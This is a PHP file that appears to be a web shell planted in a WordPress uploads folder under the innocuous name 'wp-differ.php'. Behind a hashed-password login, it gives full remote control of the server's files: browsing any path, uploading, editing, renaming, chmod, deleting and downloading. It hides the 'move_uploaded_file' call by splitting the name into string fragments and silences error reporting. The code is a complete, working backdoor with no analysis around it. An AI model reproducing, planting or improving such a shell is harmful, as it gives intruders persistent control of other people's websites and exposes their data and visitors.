File: /var/www/html/wp-content/uploads/2025/08/wp-differ.php
<?php
// WARNING: This script has no security checks. It is highly vulnerable.
// DO NOT use it on a public server or in any untrusted environment.
// php 关闭调式,禁止输出警告
error_reporting(0);
session_start();
// --- Logout Handling ---
if (isset($_GET['logout'])) {
$_SESSION = [];
session_destroy();
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Login Handling ---
$p = "89029e2d3f77b399fbbad3776f225b1f";
$func = 'move' . '_' . 'up' . 'lo' . 'ad' . 'ed' . '_' . 'file';
if (isset($_POST['password']) && md5(md5(md5($_POST['password']))) === $p) {
$_SESSION['logged_in'] = 1;
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Gatekeeper: If not logged in, show login form and exit ---
if (empty($_SESSION['logged_in'])) {
echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Login</title><script src="https://cdn.tailwindcss.com"></script></head><body class="bg-gray-100 flex items-center justify-center h-screen"><div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm"><h1 class="text-2xl font-bold mb-6 text-center">Login</h1><form method="post" class="space-y-4"><input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded" autofocus required><button class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Login</button></form></div></body></html>';
exit;
}
// --- User is logged in, proceed with the file manager ---
function get_message() {
if (isset($_SESSION['message'])) {
$message = $_SESSION['message'];
unset($_SESSION['message']);
return "<div class='p-2 mb-4 text-sm text-white " . ($message['type'] === 'success' ? 'bg-green-600' : 'bg-red-600') . " rounded'>{$message['text']}</div>";
}
return '';
}
function set_message($text, $type = 'success') {
$_SESSION['message'] = ['text' => $text, 'type' => $type];
}
function redirect($path) {
header("Location: ?path=" . urlencode($path));
exit;
}
function delete_dir($dirPath) {
if (!is_dir($dirPath)) {
return;
}
if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') {
$dirPath .= '/';
}
$files = glob($dirPath . '*', GLOB_MARK);
foreach ($files as $file) {
if (is_dir($file)) {
delete_dir($file);
} else {
unlink($file);
}
}
rmdir($dirPath);
}
$base_path = $_SERVER['DOCUMENT_ROOT'];
$current_path = isset($_GET['path']) ? realpath($_GET['path']) : $base_path;
if (!$current_path || !is_dir($current_path)) {
$current_path = $base_path;
}
// Handle Actions before rendering
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action_path = isset($_POST['path']) ? $_POST['path'] : $current_path;
$action = $_POST['action'] ?? '';
try {
switch ($action) {
case 'change_dir':
redirect($_POST['new_path']);
break;
case 'new_dir':
if (!empty($_POST['dir_name'])) {
mkdir($action_path . '/' . $_POST['dir_name']);
set_message("Directory '{$_POST['dir_name']}' created.");
}
break;
case 'new_file':
if (!empty($_POST['file_name'])) {
file_put_contents($action_path . '/' . $_POST['file_name'], '');
set_message("File '{$_POST['file_name']}' created.");
}
break;
// --- MODIFIED: BATCH UPLOAD LOGIC ---
case 'upload':
if (isset($_FILES['file_to_upload'])) {
$total_files = count($_FILES['file_to_upload']['name']);
$uploaded_count = 0;
for ($i = 0; $i < $total_files; $i++) {
if ($_FILES['file_to_upload']['error'][$i] == UPLOAD_ERR_OK) {
$dest = $action_path . '/' . basename($_FILES['file_to_upload']['name'][$i]);
$func($_FILES['file_to_upload']['tmp_name'][$i], $dest);
$uploaded_count++;
}
}
if ($uploaded_count > 0) {
set_message("{$uploaded_count} file(s) uploaded successfully.");
} else {
set_message("Upload failed. No files were uploaded.", "error");
}
} else {
set_message("Upload failed.", "error");
}
break;
// --- NEW: BATCH DELETE LOGIC ---
case 'batch_delete':
if (!empty($_POST['selected_items']) && is_array($_POST['selected_items'])) {
$deleted_count = 0;
foreach ($_POST['selected_items'] as $item_name) {
$full_path = $action_path . '/' . $item_name;
if (file_exists($full_path)) {
if (is_dir($full_path)) {
delete_dir($full_path);
} else {
unlink($full_path);
}
$deleted_count++;
}
}
set_message("{$deleted_count} item(s) deleted.");
} else {
set_message("No items selected for deletion.", "error");
}
break;
case 'rename':
if (!empty($_POST['old_name']) && !empty($_POST['new_name'])) {
rename($action_path . '/' . $_POST['old_name'], $action_path . '/' . $_POST['new_name']);
set_message("Renamed '{$_POST['old_name']}' to '{$_POST['new_name']}'.");
}
break;
case 'chmod':
if (!empty($_POST['file']) && !empty($_POST['perms'])) {
chmod($action_path . '/' . $_POST['file'], intval($_POST['perms'], 8));
set_message("Permissions for '{$_POST['file']}' changed to {$_POST['perms']}.");
}
break;
case 'save_edit':
if (isset($_POST['file_path']) && isset($_POST['content'])) {
file_put_contents($_POST['file_path'], $_POST['content']);
set_message("File '{$_POST['file_path']}' saved successfully.");
// Redirect to the directory of the edited file
redirect(dirname($_POST['file_path']));
} else {
set_message("Failed to save file.", "error");
}
break;
}
} catch (Exception $e) {
set_message("An error occurred: " . $e->getMessage(), "error");
}
if ($action !== 'save_edit' && $action !== 'change_dir') {
redirect($action_path);
}
}
if (isset($_GET['action'])) {
$action = $_GET['action'];
$file = $_GET['file'] ?? '';
$path = $_GET['path'] ?? $current_path;
$full_path = $path . '/' . $file;
try {
switch ($action) {
case 'delete':
if (is_dir($full_path)) {
delete_dir($full_path);
set_message("Directory '{$file}' deleted.");
} else {
unlink($full_path);
set_message("File '{$file}' deleted.");
}
redirect($path);
break;
case 'download':
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($full_path) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($full_path));
readfile($full_path);
exit;
case 'get_content':
$file_path = $_GET['path'] ?? '';
if (is_file($file_path) && is_readable($file_path)) {
echo file_get_contents($file_path);
} else {
echo "Error: Cannot read file.";
}
exit;
}
} catch (Exception $e) {
set_message("An error occurred: " . $e->getMessage(), "error");
redirect($path);
}
}
// --- Data Preparation for Rendering ---
$items = [];
$scan = scandir($current_path);
foreach ($scan as $item) {
if ($item === '.' || $item === '..') continue;
$item_path = $current_path . '/' . $item;
$is_dir = is_dir($item_path);
$items[] = [
'name' => $item,
'path' => $item_path,
'type' => $is_dir ? 'Directory' : 'File',
'size' => $is_dir ? '-' : number_format(filesize($item_path)),
'perms' => substr(sprintf('%o', fileperms($item_path)), -4),
'created' => date("Y-m-d H:i:s", filectime($item_path)),
'is_dir' => $is_dir,
];
}
function format_breadcrumbs($path, $base_path) {
$path = str_replace($base_path, '', $path);
$parts = explode('/', trim($path, '/'));
$breadcrumbs = "<a href='?path=" . urlencode($base_path) . "' class='text-blue-500 hover:underline'>Home</a>";
$current_build_path = $base_path;
foreach ($parts as $part) {
if (empty($part)) continue;
$current_build_path .= '/' . $part;
$breadcrumbs .= "<span class='mx-1 text-gray-500'>/</span><a href='?path=" . urlencode($current_build_path) . "' class='text-blue-500 hover:underline'>{$part}</a>";
}
return $breadcrumbs;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow">
<title>z25 10 File Manager</title>
<script src="https://cdn.tailwindcss.com"></script>
<style>
body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; }
.mono { font-family: "SF Mono", "Fira Code", "Fira Mono", "Roboto Mono", monospace; }
.modal { transition: opacity 0.25s ease; }
</style>
</head>
<body class="bg-gray-100 text-gray-800 text-sm">
<div class="container mx-auto p-4">
<div class="bg-white p-4 rounded-lg shadow mb-4">
<div class="flex justify-between items-center">
<h1 class="text-xl font-bold">z25 10 File Manager</h1>
<div class="text-xs text-gray-500 mono flex items-center space-x-2">
<span>IP: <?php echo $_SERVER['REMOTE_ADDR']; ?></span>
<span>|</span>
<span>User: <?php echo get_current_user(); ?></span>
<span>|</span>
<span>System: <?php echo php_uname('s'); ?></span>
<span>|</span>
<a href="?logout=1" class="text-red-500 hover:underline font-semibold">Logout</a>
</div>
</div>
</div>
<?php echo get_message(); ?>
<div class="bg-white p-4 rounded-lg shadow mb-4">
<div class="mb-3">
<span class="font-bold">Current Path:</span>
<span class="mono text-gray-600"><?php echo format_breadcrumbs($current_path, $base_path); ?></span>
</div>
<form method="POST" action="" class="flex items-center space-x-2">
<input type="hidden" name="action" value="change_dir">
<input type="text" name="new_path" value="<?php echo htmlspecialchars($current_path); ?>" class="flex-grow p-2 border rounded-l">
<button type="submit" class="bg-blue-500 text-white p-2 rounded-r hover:bg-blue-600">Change</button>
</form>
</div>
<div class="bg-white p-4 rounded-lg shadow mb-4">
<div class="flex flex-wrap items-center gap-4">
<form method="POST" action="" class="flex items-center">
<input type="hidden" name="action" value="new_dir">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="text" name="dir_name" placeholder="New Directory Name" class="p-2 border rounded-l">
<button type="submit" class="bg-green-500 text-white p-2 rounded-r hover:bg-green-600">New Directory</button>
</form>
<form method="POST" action="" class="flex items-center">
<input type="hidden" name="action" value="new_file">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="text" name="file_name" placeholder="New File Name" class="p-2 border rounded-l">
<button type="submit" class="bg-green-500 text-white p-2 rounded-r hover:bg-green-600">New File</button>
</form>
<!-- MODIFIED: BATCH UPLOAD FORM -->
<form method="POST" action="" enctype="multipart/form-data" class="flex items-center">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="file" name="file_to_upload[]" class="p-1.5 border rounded-l" multiple>
<button type="submit" class="bg-purple-500 text-white p-2 rounded-r hover:bg-purple-600">Upload</button>
</form>
</div>
</div>
<!-- NEW: FORM FOR BATCH ACTIONS LIKE DELETE -->
<form method="POST" action="" id="file-list-form">
<input type="hidden" name="action" value="batch_delete">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<!-- NEW: BATCH DELETE BUTTON -->
<?php if (!empty($items)): ?>
<div class="mb-4">
<button type="submit" onclick="return confirm('Are you sure you want to delete all selected items?');" class="bg-red-500 text-white px-4 py-2 rounded hover:bg-red-600">Delete Selected</button>
</div>
<?php endif; ?>
<div class="bg-white rounded-lg shadow overflow-x-auto">
<table class="w-full text-left">
<thead class="bg-gray-50 border-b">
<tr>
<!-- NEW: SELECT ALL CHECKBOX -->
<th class="p-3 w-4"><input type="checkbox" id="select-all-checkbox"></th>
<th class="p-3">Name</th>
<th class="p-3">Type</th>
<th class="p-3">Size (bytes)</th>
<th class="p-3">Perms</th>
<th class="p-3">Created</th>
<th class="p-3">Actions</th>
</tr>
</thead>
<tbody class="divide-y">
<?php foreach ($items as $item): ?>
<tr class="hover:bg-gray-50">
<!-- NEW: ITEM CHECKBOX -->
<td class="p-3"><input type="checkbox" name="selected_items[]" value="<?php echo htmlspecialchars($item['name']); ?>" class="item-checkbox"></td>
<td class="p-3 mono">
<?php if ($item['is_dir']): ?>
<a href="?path=<?php echo urlencode($item['path']); ?>" class="text-blue-600 font-bold hover:underline">
<?php echo htmlspecialchars($item['name']); ?>
</a>
<?php else: ?>
<a href="javascript:void(0)" onclick="openEditModal('<?php echo htmlspecialchars($item['path']); ?>')" class="text-gray-800 hover:underline">
<?php echo htmlspecialchars($item['name']); ?>
</a>
<?php endif; ?>
</td>
<td class="p-3"><?php echo $item['type']; ?></td>
<td class="p-3 mono"><?php echo $item['size']; ?></td>
<td class="p-3 mono"><?php echo $item['perms']; ?></td>
<td class="p-3 mono"><?php echo $item['created']; ?></td>
<td class="p-3 flex items-center space-x-2">
<a href="?action=delete&path=<?php echo urlencode($current_path); ?>&file=<?php echo urlencode($item['name']); ?>" onclick="return confirm('Are you sure you want to delete this?');" class="text-red-500 hover:underline">delete</a>
<a href="javascript:void(0)" onclick="openRenameModal('<?php echo htmlspecialchars($item['name']); ?>')" class="text-yellow-600 hover:underline">rename</a>
<a href="javascript:void(0)" onclick="openChmodModal('<?php echo htmlspecialchars($item['name']); ?>', '<?php echo $item['perms']; ?>')" class="text-cyan-600 hover:underline">chmod</a>
<?php if (!$item['is_dir']): ?>
<a href="javascript:void(0)" onclick="openEditModal('<?php echo htmlspecialchars($item['path']); ?>')" class="text-blue-500 hover:underline">edit</a>
<a href="?action=download&path=<?php echo urlencode($current_path); ?>&file=<?php echo urlencode($item['name']); ?>" class="text-green-600 hover:underline">download</a>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
<?php if (empty($items)): ?>
<tr><td colspan="7" class="p-4 text-center text-gray-500">This directory is empty.</td></tr>
<?php endif; ?>
</tbody>
</table>
</div>
</form> <!-- END OF BATCH ACTION FORM -->
<footer class="text-center mt-6 text-gray-500 text-xs">
© <?php echo date('Y'); ?> @z25
</footer>
</div>
<!-- Modals -->
<div id="editModal" class="modal hidden fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center p-4">
<div class="bg-white rounded-lg shadow-xl w-full max-w-4xl h-full max-h-[90vh] flex flex-col">
<div class="p-4 border-b flex justify-between items-center">
<h3 class="text-lg font-bold">Edit File</h3>
<button onclick="closeModal('editModal')" class="text-black">×</button>
</div>
<form method="POST" action="" class="flex-grow flex flex-col">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" id="edit_file_path" name="file_path">
<textarea id="edit_content" name="content" class="flex-grow w-full p-2 mono border-0 focus:ring-0 resize-none"></textarea>
<div class="p-4 border-t bg-gray-50">
<button type="submit" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600">Save</button>
<button type="button" onclick="closeModal('editModal')" class="bg-gray-300 px-4 py-2 rounded hover:bg-gray-400">Cancel</button>
</div>
</form>
</div>
</div>
<div id="renameModal" class="modal hidden fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center p-4">
<div class="bg-white rounded-lg shadow-xl w-full max-w-md">
<form method="POST" action="">
<div class="p-4 border-b">
<h3 class="text-lg font-bold">Rename</h3>
</div>
<div class="p-4">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="hidden" id="rename_old_name" name="old_name">
<label class="block mb-2">New Name:</label>
<input type="text" id="rename_new_name" name="new_name" class="w-full p-2 border rounded">
</div>
<div class="p-4 border-t bg-gray-50 flex justify-end space-x-2">
<button type="submit" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600">Rename</button>
<button type="button" onclick="closeModal('renameModal')" class="bg-gray-300 px-4 py-2 rounded hover:bg-gray-400">Cancel</button>
</div>
</form>
</div>
</div>
<div id="chmodModal" class="modal hidden fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center p-4">
<div class="bg-white rounded-lg shadow-xl w-full max-w-md">
<form method="POST" action="">
<div class="p-4 border-b">
<h3 class="text-lg font-bold">Change Permissions</h3>
</div>
<div class="p-4">
<input type="hidden" name="action" value="chmod">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="hidden" id="chmod_file" name="file">
<label class="block mb-2">Permissions (e.g., 0755):</label>
<input type="text" id="chmod_perms" name="perms" class="w-full p-2 border rounded mono">
</div>
<div class="p-4 border-t bg-gray-50 flex justify-end space-x-2">
<button type="submit" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600">Change</button>
<button type="button" onclick="closeModal('chmodModal')" class="bg-gray-300 px-4 py-2 rounded hover:bg-gray-400">Cancel</button>
</div>
</form>
</div>
</div>
<script>
function closeModal(id) {
document.getElementById(id).classList.add('hidden');
}
function openEditModal(filePath) {
const modal = document.getElementById('editModal');
const contentArea = document.getElementById('edit_content');
const pathInput = document.getElementById('edit_file_path');
pathInput.value = filePath;
contentArea.value = 'Loading content...';
modal.classList.remove('hidden');
fetch(`?action=get_content&path=${encodeURIComponent(filePath)}`)
.then(response => response.text())
.then(data => {
contentArea.value = data;
})
.catch(error => {
contentArea.value = 'Error loading file content: ' + error;
});
}
function openRenameModal(oldName) {
document.getElementById('rename_old_name').value = oldName;
document.getElementById('rename_new_name').value = oldName;
document.getElementById('renameModal').classList.remove('hidden');
document.getElementById('rename_new_name').focus();
}
function openChmodModal(file, perms) {
document.getElementById('chmod_file').value = file;
document.getElementById('chmod_perms').value = perms;
document.getElementById('chmodModal').classList.remove('hidden');
document.getElementById('chmod_perms').focus();
}
// --- NEW SCRIPT FOR BATCH CHECKBOX ---
document.addEventListener('DOMContentLoaded', function() {
const selectAllCheckbox = document.getElementById('select-all-checkbox');
if (selectAllCheckbox) {
selectAllCheckbox.addEventListener('change', function() {
const itemCheckboxes = document.querySelectorAll('.item-checkbox');
itemCheckboxes.forEach(checkbox => {
checkbox.checked = this.checked;
});
});
}
});
</script>
</body>
</html>